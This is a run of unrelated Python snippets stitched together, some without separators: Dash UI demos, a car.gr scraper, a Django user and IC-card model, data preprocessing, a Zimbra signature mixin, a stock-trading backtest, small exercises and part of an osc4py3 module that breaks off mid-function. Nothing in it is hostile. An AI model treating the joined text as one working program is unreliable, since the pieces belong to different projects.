                dbc.ListGroupItem("The primary item", color="primary"),
                dbc.ListGroupItem("A secondary item", color="secondary"),
                dbc.ListGroupItem("A successful item", color="success"),
                dbc.ListGroupItem("A warning item", color="warning"),
                dbc.ListGroupItem("A dangerous item", color="danger"),
                dbc.ListGroupItem("An informative item", color="info"),
                dbc.ListGroupItem("A light item", color="light"),
                dbc.ListGroupItem("A dark item", color="dark"),
                # action=True renders hover/click styling like a link
                dbc.ListGroupItem("An action item", action=True),
                dbc.ListGroupItem("An active item", active=True),
                # items may contain arbitrary Dash components, not just text
                dbc.ListGroupItem(
                    [
                        html.H5("Item 4 heading"),
                        html.P("Item 4 text"),
                    ]
                ),
            ]
        ),
    ],
    className="mb-4",
)
|
# Read a product price and print it with a 5% discount applied.
price = float(input('Preço do produto: R$'))
discount = price*5/100
final_price = price - discount
print('Com 5% de desconto esse produto fica por R${:.2f}'.format(final_price))
import requests
from bs4 import BeautifulSoup
import lxml
import re
import datetime
import pandas as pd
def CarGrDataParser_New(urllink):
    """Scrape one car.gr classifieds results page into parallel field lists.

    :param urllink: URL of a car.gr search-results page.
    :return: dict with keys brand, price, kilometers, engine_cc, engine_bhp,
             date, fuel, gear; each value is a list with one entry per
             listing. Missing values become the string 'n/a'.

    NOTE(review): selectors depend on car.gr's current CSS class names and
    Greek title attributes; a site redesign silently breaks them — confirm
    periodically.
    """
    html_text = requests.get(urllink)
    soup = BeautifulSoup(html_text.content, "html.parser")
    # Raw strings for regexes: non-raw '\d' escapes are deprecated in Python.
    # Kilometers look like '12.345' (dot = thousands separator) or '123'.
    re1 = re.compile(r"(\d{1,3}\.\d{3}|\d{1,3})")
    # Registration date looks like 'MM/YYYY'.
    re2 = re.compile(r"\d{2}/\d{4}")
    Brand = []; Price = []; Date = []; EngVol = []; EngPow = []; Fuel = []; Mileage = []; Gear = []
    # Each listing is rendered inside one of these row containers.
    results = soup.find_all("div", class_="row p-2 position-relative no-gutters")
    for result in results:
        # First word of the listing title is the manufacturer.
        Brand.append(result.find("div", class_="title font-size-xl title").text.split()[0])
        price = result.find("span", class_="price-no-decimals").text
        price = int(price.replace('.', ''))  # drop thousands separators
        Price.append(price)
        date = result.find("span", class_="key-feature", title="Χρονολογία")  # registration date
        if date:
            date_num = datetime.datetime.strptime(re2.findall(date.text)[0], '%m/%Y')
        else:
            date_num = 'n/a'
        Date.append(date_num)
        enginecc = result.find("span", class_="key-feature", title="Κυβικά")  # engine size
        if enginecc:
            enginecc = enginecc.text
            enginecc = re.findall(r'\b\d+\b', enginecc)
            # Assumes text like '1.4 lt / 90 bhp': litres+tenths -> cc, then
            # power — TODO confirm against a live page.
            engVol = int(enginecc[0]) * 1000 + int(enginecc[1])
            engPow = int(enginecc[2])
        else:
            engVol = 'n/a'
            engPow = 'n/a'
        EngVol.append(engVol)
        EngPow.append(engPow)
        fuel = result.find("span", class_="key-feature", title="Καύσιμο")  # fuel type
        if fuel:
            fuel = re.findall(r'\w+', fuel.text)
        else:
            fuel = 'n/a'
        Fuel.append(fuel)
        km = result.find("span", class_="key-feature", title="Χιλιόμετρα")  # mileage
        if km:
            km = re1.search(km.text).group(1)
            km_num = int(km.replace('.', ''))
        else:
            km_num = 'n/a'
        Mileage.append(km_num)
        # Gear is recorded only as presence/absence of the gearbox tag.
        gear = result.find("span", class_="key-feature", title="Σασμάν")
        if gear:
            gear = True
        else:
            gear = False
        Gear.append(gear)
    return {"brand": Brand,
            "price": Price,
            "kilometers": Mileage,
            "engine_cc": EngVol,
            "engine_bhp": EngPow,
            "date": Date,
            "fuel": Fuel,
            "gear": Gear}
# Accumulator for all pages; keys mirror CarGrDataParser_New's output.
CarData = {"brand": [],
           "price": [],
           "kilometers": [],
           "engine_cc": [],
           "engine_bhp": [],
           "date": [],
           "fuel": [],
           "gear": []}
# Loop through the result pages (currently 22 available, hence range 0..20).
# TODO: follow the 'Next Page' link instead of hard-coding the page count.
for ppp in range(0, 21):
    PageNum = ppp + 1
    # BUG FIX: the original URL contained a literal '®' where '&reg' had been
    # swallowed as an HTML entity; restored to '&registration-from='.
    urllink = ("https://www.car.gr/classifieds/cars/?category=11&condition=used&doors=4-5"
               "&engine_size-from=%3E1000&fromfeed=1&fuel_type=1&fuel_type=8"
               "&mileage-to=%3C200000&pg=" + "%d" % PageNum +
               "&price-from=%3E8000&price-to=%3C25000&registration-from=%3E2015&rg=2")
    CarDataTemp = CarGrDataParser_New(urllink)
    # Merge this page's lists into the accumulator, key by key.
    for key in CarData:
        CarData[key].extend(CarDataTemp[key])
df = pd.DataFrame(CarData)
df.to_csv(path_or_buf="CarGr_data.csv", encoding='utf-8-sig')  # utf-8-sig preserves Greek text in Excel
|
# Split a Korean address into city (si), district (gu) and
# neighbourhood (dong) using fixed character positions.
address = "부산광역시 수영구 민락동"
si = address[:5]      # "부산광역시" — first five characters (city)
goo = address[6:9]    # "수영구" — three characters after the first space (district)
dong = address[-3:]   # "민락동" — last three characters (neighbourhood)
print("시 : ",si,", 구 : ",goo,", 동 : ",dong)
|
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin, UnicodeUsernameValidator, UserManager
from django.contrib.contenttypes.models import ContentType
from django.core.mail import send_mail
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
import uuid
from django.core.validators import MinLengthValidator, RegexValidator, MinValueValidator, MaxValueValidator
from kagipos.errors import CustomError
class User(AbstractBaseUser, PermissionsMixin):
    """
    An abstract base class implementing a fully featured User model with
    admin-compliant permissions.

    Username and password are required. Other fields are optional.
    """
    username_validator = UnicodeUsernameValidator()

    username = models.CharField(
        verbose_name=_('username'),
        max_length=150,
        unique=True,
        help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
        validators=[username_validator],
        error_messages={
            'unique': _("A user with that username already exists."),
        },
    )
    first_name = models.CharField(verbose_name=_('first name'), max_length=30)
    last_name = models.CharField(verbose_name=_('last name'), max_length=150)
    email = models.EmailField(verbose_name=_('email address'), blank=True)
    # Student ID number: constrained to exactly five digits.
    number = models.PositiveIntegerField(
        verbose_name=_('学籍番号'),
        unique=True,
        validators=[MinValueValidator(10000), MaxValueValidator(99999)]
    )
    # Prepaid balance; save() rejects negative values with a domain error.
    wallet = models.PositiveIntegerField(verbose_name=_('所持金額'), default=0)
    is_staff = models.BooleanField(
        verbose_name=_('staff status'),
        default=False,
        help_text=_('Designates whether the user can log into this admin site.'),
    )
    is_active = models.BooleanField(
        verbose_name=_('active'),
        default=True,
        help_text=_(
            'Designates whether this user should be treated as active. '
            'Unselect this instead of deleting accounts.'
        ),
    )
    date_joined = models.DateTimeField(verbose_name=_('date joined'), default=timezone.now)

    objects = UserManager()

    EMAIL_FIELD = 'email'
    USERNAME_FIELD = 'username'
    REQUIRED_FIELDS = ['first_name', 'last_name', 'email', 'number']

    class Meta:
        verbose_name = _('user')
        verbose_name_plural = _('users')

    def save(self, *args, **kwargs):
        # wallet is a PositiveIntegerField, but Python-level assignment can
        # still make it negative before saving — reject with a domain error.
        if self.wallet < 0:
            raise CustomError('残高が足りません')
        super().save(*args, **kwargs)

    def clean(self):
        super().clean()
        self.email = self.__class__.objects.normalize_email(self.email)

    def get_full_name(self):
        """
        Return the first_name plus the last_name, with a space in between.
        """
        full_name = '%s %s' % (self.first_name, self.last_name)
        return full_name.strip()

    def get_short_name(self):
        """Return the short name for the user."""
        return self.first_name

    def email_user(self, subject, message, from_email=None, **kwargs):
        """Send an email to this user."""
        send_mail(subject, message, from_email, [self.email], **kwargs)
class IDmField(models.CharField):
    """CharField storing a FeliCa IDm: exactly 16 uppercase hex digits.

    max_length is fixed to 16 and the field is unique by default.
    """
    description = _("FeliCa's IDm")
    default_validators = [
        RegexValidator(regex='^[0-9A-F]{16}$', message=_("IDm must be 16-digit hexadecimal number")),
        MinLengthValidator(16)
    ]

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('verbose_name', 'FeliCa ID')
        kwargs.setdefault('unique', True)
        # Force the fixed length regardless of what the caller passes.
        kwargs['max_length'] = 16
        super().__init__(*args, **kwargs)

    def deconstruct(self):
        # max_length is implied by this field class, so keep it out of
        # generated migrations.
        name, path, args, kwargs = super().deconstruct()
        del kwargs["max_length"]
        return name, path, args, kwargs
class Card(models.Model):
    """A physical IC card (FeliCa) linked to its owning User."""
    # Guest cards are distinguished from personal ones by this flag.
    is_guest = models.BooleanField(verbose_name='ゲスト', default=False)
    name = models.CharField(verbose_name='カード名', max_length=100)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='cards', verbose_name='所持ユーザー')
    idm = IDmField()

    class Meta:
        verbose_name = _('ICカード')
        verbose_name_plural = _('ICカード')

    def save(self, *args, **kwargs):
        # Run field/model validation (incl. the IDm format) on every save.
        self.full_clean()
        super().save(*args, **kwargs)
class Temporary(models.Model):
    """Pending card-to-user link: an IDm waiting to be claimed via its UUID."""
    idm = IDmField()
    uuid = models.UUIDField(verbose_name='UUID', default=uuid.uuid4, editable=False)

    class Meta:
        verbose_name = _('紐づけデータ')
        verbose_name_plural = _('紐づけデータ')

    def save(self, *args, **kwargs):
        # Validate the IDm format before persisting.
        self.full_clean()
        super().save(*args, **kwargs)
def get_user_from_idm(idm):
    """Return the User owning the card with the given FeliCa IDm.

    Propagates User.DoesNotExist / MultipleObjectsReturned per Django's
    ``Manager.get`` contract.
    """
    return User.objects.get(cards__idm=idm)
class Invitation(models.Model):
    """One-time invitation identified by a UUID primary key."""
    # BUG FIX: default must be the *callable* uuid.uuid4, not uuid.uuid4().
    # The original called it once at import time, so every Invitation row
    # would have received the same primary key (and later inserts would
    # collide or overwrite).
    uuid = models.UUIDField(verbose_name='UUID', primary_key=True, default=uuid.uuid4, editable=False)
    is_active = models.BooleanField(verbose_name='有効性', default=True)
    generated_time = models.DateTimeField(verbose_name='生成された時間', default=timezone.now)
    # Set once the invited person completes registration.
    registered_user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='invitations', verbose_name='登録ユーザー', blank=True, null=True)

    class Meta:
        verbose_name = _('招待')
        verbose_name_plural = _('招待')
|
import pandas as pd
from sklearn.preprocessing import LabelEncoder
from scipy.stats import zscore
from sklearn.preprocessing import scale
import numpy as np
import warnings
warnings.filterwarnings("ignore")
def encode_label(df):
    """Encode class labels as consecutive integers via sklearn's LabelEncoder."""
    print("Encode labels ...")
    encoder = LabelEncoder()
    encoded = encoder.fit_transform(df)
    return encoded
def preprocess_data(df, features_columns, label=None, z_score=False, standardize=False):
    """Prepare a dataset for training.

    :param df: input DataFrame.
    :param features_columns: feature column names to keep as inputs.
    :param label: name of the label column to extract; None means no labels.
    :param z_score: drop rows where any feature has |z-score| >= 4.
    :param standardize: center/reduce features with sklearn's ``scale``.
    :return: the features DataFrame, or ``(features, labels)`` when *label*
             is given.
    """
    print("------------------------------------------")
    print(" Preprocessing data ")
    print("------------------------------------------")
    print("Get dataset")
    print("Shape of the data to process : " + str(df.shape))
    print("------------------------------------------")
    # Create inputs and labels
    if label is not None:
        print("Extract labels ...")
        # BUG FIX: honour the requested label column instead of the
        # hard-coded 'genre'.
        df_labels = df[label]
    # inputs
    print("Extract inputs ...")
    df = df[features_columns]
    # Remove outliers
    if z_score:
        print("Remove outliers with zscore ...")
        z_scores = zscore(df)
        abs_z_scores = np.abs(z_scores)
        filtered_entries = (abs_z_scores < 4).all(axis=1)
        df = df[filtered_entries]
        if label is not None:
            # Keep labels aligned with the surviving rows.
            df_labels = df_labels[filtered_entries]
    # Standardize : center and reduce
    if standardize:
        print("Center and reduce inputs ...")
        df = scale(df, axis=0, with_mean=True, with_std=True)
        df = pd.DataFrame(df, columns=features_columns)
    print("------------------------------------------")
    print("Data shape after preprocessing : " + str(df.shape))
    if label is not None:
        print("Labels shape : " + str(df_labels.shape))
    print("Return dataset(s) ...")
    print("Preprocessing finished")
    print("------------------------------------------")
    if label is not None:
        df_labels = pd.DataFrame(df_labels, columns=[label])
        res = (df, df_labels)
    else:
        res = df
    return res
def preprocess_data_exo2(df, features_columns, z_score=False, standardize=False):
    """Preprocess *df*, returning the full frame (all columns).

    Unlike :func:`preprocess_data`, non-feature columns are preserved; the
    feature columns are optionally outlier-filtered and standardized.

    :param df: input DataFrame.
    :param features_columns: columns used as model inputs.
    :param z_score: drop rows where any feature has |z-score| >= 4.
    :param standardize: center/reduce features with sklearn's ``scale``.
    :return: the filtered/standardized DataFrame.
    """
    print("------------------------------------------")
    print(" Preprocessing data exo2 ")
    print("------------------------------------------")
    print("Get dataset")
    print("------------------------------------------")
    # inputs
    print("Extract inputs ...")
    df_features = df[features_columns]
    print("Shape of the data to process : " + str(df.shape))
    # Remove outliers
    if z_score:
        print("Remove outliers with zscore ...")
        z_scores = zscore(df_features)
        abs_z_scores = np.abs(z_scores)
        filtered_entries = (abs_z_scores < 4).all(axis=1)
        # Keeping non-outlier elements
        df = df[filtered_entries]
        # BUG FIX: keep the feature view in sync with the filtered frame;
        # the original left df_features stale, so a later standardize pass
        # would scale rows that had just been dropped.
        df_features = df_features[filtered_entries]
    # Standardize : center and reduce
    if standardize:
        print("Center and reduce inputs ...")
        features_matrix = scale(df_features, axis=0, with_mean=True, with_std=True)
        # BUG FIX: assign the raw ndarray so values align by position; the
        # original wrapped it in a fresh default-index DataFrame, and the
        # .loc assignment then aligned on index, yielding NaNs after any
        # filtering.
        df.loc[:, features_columns] = features_matrix
    print("------------------------------------------")
    print("Data shape after preprocessing : " + str(df.shape))
    print("Return dataset(s) ...")
    print("Preprocessing finished")
    print("------------------------------------------")
    return df
|
from zimsoap import zobjects
class MethodMixin:
    """Mixin adding Zimbra signature CRUD operations to an account client.

    All methods go through ``self.request`` / ``self.request_list``, which the
    host class is expected to provide.
    """

    def create_signature(self, name, content, contenttype="text/html"):
        """
        :param: name verbose name of the signature
        :param: content content of the signature, in html or plain-text
        :param: contenttype can be "text/html" (default) or "text/plain"
        :returns: a zobjects.Signature object
        """
        s = zobjects.Signature(name=name)
        s.set_content(content, contenttype)
        resp = self.request('CreateSignature', {'signature': s.to_creator()})
        return zobjects.Signature.from_dict(resp['signature'])

    def get_signatures(self):
        """ Get all signatures for the current user

        :returns: a list of zobjects.Signature
        """
        signatures = self.request_list('GetSignatures')
        return [zobjects.Signature.from_dict(i) for i in signatures]

    def get_signature(self, signature):
        """Retrieve one signature, discriminated by name or id.

        Note that signature name is not case sensitive.

        :param: a zobjects.Signature describing the signature,
            like "Signature(name='my-sig')"
        :returns: the matching zobjects.Signature, or None if no signature
            matches (or the account has no signatures at all).
        """
        resp = self.request_list('GetSignatures')
        # GetSignature does not allow to filter the results, so we do it by
        # hand...
        if resp and (len(resp) > 0):
            for sig_dict in resp:
                sig = zobjects.Signature.from_dict(sig_dict)
                if hasattr(signature, 'id'):
                    its_this_one = (sig.id == signature.id)
                elif hasattr(signature, 'name'):
                    # Case-insensitive name comparison.
                    its_this_one = (sig.name.upper() == signature.name.upper())
                else:
                    raise ValueError('should mention one of id,name')
                if its_this_one:
                    return sig
            else:
                # for/else: the loop finished without returning, so nothing
                # matched.
                return None

    def delete_signature(self, signature):
        """ Delete a signature by name or id

        :param: signature a Signature object with name or id defined
        """
        self.request('DeleteSignature', {'signature': signature.to_selector()})

    def modify_signature(self, signature):
        """ Modify an existing signature

        Can modify the content, contenttype and name. An unset attribute will
        not delete the attribute but leave it untouched.

        :param: signature a zobject.Signature object, with modified
                content/contentype/name, the id should be present and
                valid, the name does not allows to identify the
                signature for that operation.
        """
        # if no content is specified, just use a selector (id/name)
        dic = signature.to_creator(for_modify=True)
        self.request('ModifySignature', {'signature': dic})
|
# Euler 47.Distinct primes factors
import math
def factor(n):
    """Return the prime factorisation of *n* as a non-decreasing list.

    Examples: factor(12) -> [2, 2, 3]; factor(13) -> [13]; n <= 1 -> [].
    """
    if n <= 1:
        return []
    # The smallest divisor of n in [2, sqrt(n)] is necessarily prime; if
    # none exists, n itself is prime. math.isqrt avoids the float rounding
    # pitfalls of math.ceil(math.sqrt(n)) for large n.
    prime = next((x for x in range(2, math.isqrt(n) + 1) if n % x == 0), n)
    return [prime] + factor(n // prime)
# Project Euler 47: find the first of four consecutive integers that each
# have exactly four distinct prime factors; print the first of the run.
n = 4
candidate = 0
streak = 0
while True:
    candidate += 1
    if len(set(factor(candidate))) == n:
        streak += 1
    else:
        streak = 0
    if streak == n:
        result = candidate - n + 1
        break
print(result)
import datetime
import logging
import tushare as ts
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow import keras
import tensorflow as tf
from ts.st_history_data import x_train_col_index, column_names, load_data, code
logging.basicConfig(level=logging.INFO)
# Show all columns when printing DataFrames
pd.set_option('display.max_columns', None)
# Show all rows
pd.set_option('display.max_rows', None)
# Display up to 100 characters per value (default is 50)
pd.set_option('max_colwidth',100)
# Hourly (60-minute) K-line data for the backtest window
df = ts.get_hist_data(code, start='2018-11-01', end='2018-11-30', ktype='60')
df = df.sort_values(axis=0, ascending=True, by='date')
# Target price-change thresholds that trigger buy/sell decisions
target_price = {'min_change': -0.02, 'max_change': 0.02}
# Initial account balance
account_init = 10000
account_total = account_init
change_fee = 0.0        # cumulative trading fees
change_unit = 100       # shares traded per order
# Shares currently held
stock_total = 0
data_count = len(df)
day = 0
# T0/T1 split — presumably a T+1 market: T0 holds today's buys, T1 holds
# shares that are already sellable. TODO confirm against the trading rules.
T0 = 0
T1 = 0
logging.info("data count:%s", data_count)
# Pretrained per-stock p_change prediction model
new_model = keras.models.load_model(code + '_p_change_model.h5')
logging.info(new_model.summary())
def sell_fee(change_unit, price):
    """Return the fee for selling `change_unit` shares at `price`.

    Side effect: adds the fee to the module-level `change_fee` accumulator.
    """
    global change_fee
    trade_value = change_unit * price
    fee = trade_value * 0.0001 + trade_value * 0.0003 + change_unit / 1000 * 1
    change_fee = change_fee + fee
    return fee
def buy_fee(change_unit, price):
    """Return the fee for buying `change_unit` shares at `price`.

    Side effect: adds the fee to the module-level `change_fee` accumulator.
    """
    global change_fee
    fee = change_unit * price * 0.0001 + change_unit / 1000 * 1
    change_fee = change_fee + fee
    return fee
def print_account():
    """Log a snapshot of the backtest state.

    Reads the module-level globals account_init, account_total, stock_total,
    price (current bar price), target_price and change_fee.
    """
    logging.info("account_init:%f,account_total:%f, account pre:%f, stock:%f, price:%f, target_price:%s, change_fee:%s",
                 account_init,
                 account_total,
                 (account_total - account_init) / account_init * 100, stock_total, price, target_price, change_fee)
def get_target_price(index):
    """Predict the day's p_change and update the global target_price bands.

    :param index: bar timestamp string '%Y-%m-%d %H:%M:%S'; the previous
        day's data feeds the model. If the previous day has no data (e.g.
        weekend/holiday), recurses one day further back.
    :return: the predicted p_change (0 when no input row is available).
    """
    (train_data, train_labels), (test_data, test_labels) = load_data()
    today = datetime.datetime.strptime(index, '%Y-%m-%d %H:%M:%S')
    yesterday = today - datetime.timedelta(days=1)
    yesterday_df = ts.get_hist_data(code, start=yesterday.strftime('%Y-%m-%d'), end=yesterday.strftime('%Y-%m-%d'))
    today_df = ts.get_hist_data(code, start=today.strftime('%Y-%m-%d'), end=today.strftime('%Y-%m-%d'))
    logging.debug("yesterday_df:%s", yesterday_df)
    if len(yesterday_df) == 0:
        # No trading data for that day — walk back one more day.
        return get_target_price(yesterday.strftime('%Y-%m-%d') + ' 00:00:01')
    stock_data = np.array(yesterday_df)
    columns = yesterday_df.columns.values.tolist()
    x_train_col = x_train_col_index(columns, column_names)
    x = np.array(stock_data[:, x_train_col])
    optimizer = tf.train.RMSPropOptimizer(0.001)
    if len(x) == 0:
        return 0
    new_model.compile(loss='mse',
                      optimizer=optimizer,
                      metrics=['mae'])
    # Normalize with the training set's statistics.
    mean = train_data.mean(axis=0)
    std = train_data.std(axis=0)
    x = (x - mean) / std
    logging.debug("x:%s", x)
    test_predictions = new_model.predict(x).flatten()[0]
    today_p_change = today_df['p_change']
    # NOTE(review): the logged "loss" is test_predictions-test_predictions,
    # which is always 0 — presumably meant prediction minus today's actual
    # p_change. Confirm intent before fixing.
    logging.info("test_predictions:%f, today_df:%s, loss:%f", test_predictions, today_p_change, test_predictions-test_predictions)
    # Derive asymmetric buy/sell bands from the prediction.
    target_price['min_change'] = test_predictions * 0.01
    target_price['max_change'] = test_predictions * 0.09
    return test_predictions
old_index = ''
# Walk the hourly bars chronologically; refresh the model prediction once
# per calendar day and trade against the derived bands.
for index, row in df.iterrows():
    day = day + 1
    # Reconstruct the bar's close from its open plus the price change.
    price = float(row["open"] + row["price_change"])
    p_change = float(row["p_change"])
    date = index.split(' ')[0]
    if old_index != date:
        # New trading day: yesterday's buys become sellable (T+1,
        # presumably — see T0/T1 setup above), then re-predict.
        old_index = date
        T1 = T1 + T0
        T0 = 0
        train_val = get_target_price(index)
    logging.debug("old_index:%s, target_price:%s, train_val:%s", old_index, target_price, train_val)
    # Only trade when the predicted change lies in the 2..8 band.
    if float(train_val) < 2 or float(train_val) > 8:
        if day == data_count:
            # Last bar: liquidate remaining sellable shares.
            logging.info("清空")
            account_total = account_total + T1 * price - sell_fee(T1, price)
            T1 = 0
            print_account()
        continue
    # NOTE(review): the chained comparison "-1 > x > 1" can never be true,
    # so this guard is dead code — presumably "not (-1 < x < 1)" was
    # intended. Confirm before changing trading behaviour.
    if -1 > float(train_val) - p_change > 1:
        continue
    if p_change < target_price['min_change']:
        logging.debug("buy")
        print_account()
        if account_total > (change_unit * price):
            account_total = account_total - change_unit * price - buy_fee(change_unit, price)
            T0 = T0 + change_unit
    if p_change > target_price['max_change']:
        logging.debug("sell")
        print_account()
        if T1 > change_unit:
            account_total = account_total + change_unit * price - sell_fee(change_unit, price)
            T1 = T1 - change_unit
    if day == data_count:
        # Last bar: liquidate remaining sellable shares.
        logging.info("清空")
        account_total = account_total + T1 * price - sell_fee(T1, price)
        T1 = 0
        print_account()
|
import dash_bootstrap_components as dbc
from dash import Input, Output, State, html
# Demo layout: three buttons, each opening a modal of a different size
# ("sm", "lg", "xl"). The open/close wiring is registered further below.
modal = html.Div(
    [
        dbc.Button("Small modal", id="open-sm", className="me-1", n_clicks=0),
        dbc.Button("Large modal", id="open-lg", className="me-1", n_clicks=0),
        dbc.Button("Extra large modal", id="open-xl", n_clicks=0),
        dbc.Modal(
            [
                dbc.ModalHeader(dbc.ModalTitle("Header")),
                dbc.ModalBody("A small modal."),
            ],
            id="modal-sm",
            size="sm",
            is_open=False,
        ),
        dbc.Modal(
            [
                dbc.ModalHeader(dbc.ModalTitle("Header")),
                dbc.ModalBody("A large modal."),
            ],
            id="modal-lg",
            size="lg",
            is_open=False,
        ),
        dbc.Modal(
            [
                dbc.ModalHeader(dbc.ModalTitle("Header")),
                dbc.ModalBody("An extra large modal."),
            ],
            id="modal-xl",
            size="xl",
            is_open=False,
        ),
    ]
)
def toggle_modal(n1, is_open):
    """Flip the modal's open state when the button has been clicked.

    With no clicks yet (n1 falsy) the current state is kept unchanged.
    """
    return (not is_open) if n1 else is_open
# Register the same toggle callback for each modal size.
# NOTE(review): `app` is neither defined nor imported in this module's
# visible scope — presumably supplied by the surrounding application
# context when this snippet is assembled; confirm before running
# standalone.
app.callback(
    Output("modal-sm", "is_open"),
    Input("open-sm", "n_clicks"),
    State("modal-sm", "is_open"),
)(toggle_modal)
app.callback(
    Output("modal-lg", "is_open"),
    Input("open-lg", "n_clicks"),
    State("modal-lg", "is_open"),
)(toggle_modal)
app.callback(
    Output("modal-xl", "is_open"),
    Input("open-xl", "n_clicks"),
    State("modal-xl", "is_open"),
)(toggle_modal)
|
# Draw four 100-unit sides with three left turns (an open square path),
# then hand control to the turtle main loop.
# Fixes: the import was duplicated, and done() was called twice — the
# second call after the main loop exits is at best a no-op and can raise
# once the window has been destroyed.
from turtle import *

for _ in range(3):
    fd(100)
    lt(90)
fd(100)
done()
import pickle
import os
p = os.path.abspath('..')
# Read the data from pickle file
# Read the data from a pickle file
def read_data_from_pickle(file_name):
    """Load and return the pickled object stored at dataset/<file_name>.

    Uses a context manager so the file handle is always closed (the
    original leaked it).
    """
    with open('dataset/' + file_name, 'rb') as file:
        return pickle.load(file)
# Write the data from pickle file
# Write the data to a pickle file
def write_data_to_pickle(file_name, data):
    """Pickle *data* to dataset/<file_name>, closing the file afterwards.

    The original never closed (or flushed) the handle, risking truncated
    files on interpreter exit.
    """
    with open('dataset/' + file_name, 'wb') as file:
        pickle.dump(data, file)
|
import os.path
import glob
from .util import split2list
from .listdataset import ListDataset
from random import shuffle
def make_dataset(input_dir, split, net_name, target_dir=None):
    """Collect relative ply/npy file paths under *input_dir*.

    :param input_dir: root directory with one subdirectory per category.
    :param split: None to reuse the full list for both train and valid,
        otherwise a split spec forwarded to split2list.
    :param net_name: 'GAN' (npy inputs only), 'auto_encoder' (ply file is
        both input and target) or 'shape_completion' (separate roots).
    :param target_dir: target root, used only for 'shape_completion'.
    :return: (train_list, valid_list)
    """
    plyfiles = []
    if net_name == 'GAN':
        for dirs in os.listdir(input_dir):
            tempDir = os.path.join(input_dir, dirs)
            for in_file in glob.iglob(os.path.join(tempDir, '*.npy')):
                # Avoid shadowing the builtin `input`; store paths relative
                # to the dataset root as 'category/stem.npy'.
                in_file = os.path.basename(in_file)
                root_filename = in_file[:-4]
                plyinput = dirs + '/' + root_filename + '.npy'
                plyfiles.append([plyinput])
    if net_name == 'auto_encoder':
        # Input and target are the same file for an auto-encoder.
        target_dir = input_dir
        for dirs in os.listdir(target_dir):
            tempDir = os.path.join(input_dir, dirs)
            for target in glob.iglob(os.path.join(tempDir, '*.ply')):
                target = os.path.basename(target)
                root_filename = target[:-4]
                plytarget = dirs + '/' + root_filename + '.ply'
                plyinput = plytarget
                plyfiles.append([[plyinput], [plytarget]])
    if net_name == 'shape_completion':  # TODO remove this sometime
        for dirs in os.listdir(input_dir):
            temp_In_Dir = os.path.join(input_dir, dirs)
            for target in glob.iglob(os.path.join(temp_In_Dir, '*.ply')):
                # Input name carries a 5-char suffix before '.ply' that the
                # target name drops (hence the [:-9] slice).
                target = os.path.basename(target)
                root_filename = target[:-9]
                plytarget = dirs + '/' + root_filename + '.ply'
                plyin = dirs + '/' + target
                plyfiles.append([[plyin], [plytarget]])
    # Idiom fix: compare to None with 'is'.
    if split is None:
        return plyfiles, plyfiles
    else:
        return split2list(plyfiles, split, default_split=split)
def shapenet(input_root, target_root, split, net_name='auto_encoder', co_transforms=None, input_transforms=None, target_transforms=None, args=None, give_name=False):
    """Build (train, valid) ListDatasets from the files under input_root."""
    train_list, valid_list = make_dataset(input_root, split, net_name, target_root)
    train_dataset = ListDataset(input_root, target_root, train_list, net_name,
                                co_transforms, input_transforms, target_transforms,
                                args, mode='train', give_name=give_name)
    # Only the validation list is shuffled, matching the original behaviour.
    shuffle(valid_list)
    valid_dataset = ListDataset(input_root, target_root, valid_list, net_name,
                                co_transforms, input_transforms, target_transforms,
                                args, mode='valid', give_name=give_name)
    return train_dataset, valid_dataset
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# File: osc4py3/oscdistributing.py
# <pep8 compliant>
"""Distribute packets between low and high layers.
This call encoding/decoding functions, exchange packets between the
sending and dispatching layer dealing with OSCMessage and OSCBundle,
and the communication layer writing and reading raw data via channels.
"""
import time
import collections
import threading
import queue
from . import oscchannel
from . import oscbuildparse
from . import oscscheduling
from . import oscpacketoptions
from . import oscdispatching
SendingPacket = collections.namedtuple("SendingPacket",
"packet packopt targets")
sending_packets = queue.Queue()
# Same for sending packet thread.
# Tested on identity too.
LAST_SENDINGPACKET = SendingPacket(None, None, None)
# Reserved names unusable for channel names.
# Note that we reserve all names starting by '_'.
RESERVED_NAMES = {
"_all", # To address all channels.
"_local", # To bypass peers/channels and dispatch locally.
}
# Thread to process raw packets if not managed by polling loop.
rawpackets_thread = None
rawpackets_terminate = False
# Thread to process sent packets if not managed by polling loop.
sendpackets_thread = None
sendpackets_terminate = False
# ============================ INTERNAL FUNCTIONS ==========================
def next_sendpacket(timeout):
    """Pop the next packet waiting to be sent.

    :param timeout: maximum time to wait for a packet; 0 returns
        immediately, None waits forever.
    :type timeout: float or None
    :return: the queued SendingPacket, or None when nothing is available.
    :rtype: SendingPacket or None
    """
    # Fast path for non-blocking callers with an empty queue.
    if timeout == 0 and sending_packets.empty():
        return None
    try:
        return sending_packets.get(True, timeout)
    except queue.Empty:
        return None
def post_sendpacket(sendingpacket):
    """Queue a packet for the sending-loop to pick up.

    :param sendingpacket: packet plus its options and targets.
    :type sendingpacket: SendingPacket
    """
    sending_packets.put(sendingpacket)
def flat_names(names, _out=None):
    """Flatten arbitrarily nested containers of names into one set.

    :param names: a single name (str) or nested iterables of names
        (list, tuple, set, dict...).
    :return: all names found in the structures, in one set.
    :rtype: set
    """
    # Called recursively with the accumulator in _out; the top-level call
    # omits _out and uses the returned value.
    if _out is None:
        _out = set()
    if isinstance(names, str):
        _out.add(names)
    else:  # Assume names is iterable (list, tuple, dict, set...)
        for n in names:
            if isinstance(n, str):  # Avoid a needless recursive call.
                # BUG FIX: add the element itself — the original added the
                # whole container (`names`), which either raised TypeError
                # for unhashable containers or polluted the result set.
                _out.add(n)
            else:
                flat_names(n, _out)
    return _out
# ========================== PUBLIC SENDING FUNCTION ========================
def send_packet(packet, names, packopt=None):
    """Send an OSC message or bundle via some channels.

    The names can use some reserved names:

    * _all      To address all standard writer channels.

    And later maybe:

    * _filter   To select standard writer channels with filtering
                on addrpattern matching.

    :param packet: the bundle or message to send.
    :type packet: OSCMessage or OSCBundle
    :param names: names to select what channels to use.
    :type names: str or nested containers of str
    :param packopt: options for sending the packet.
    :type packopt: PacketOptions
    """
    # Make names a flat set of targets.
    targets = flat_names(names)
    if packopt is None:
        packopt = oscpacketoptions.PacketOptions()
    if packopt.nodelay:
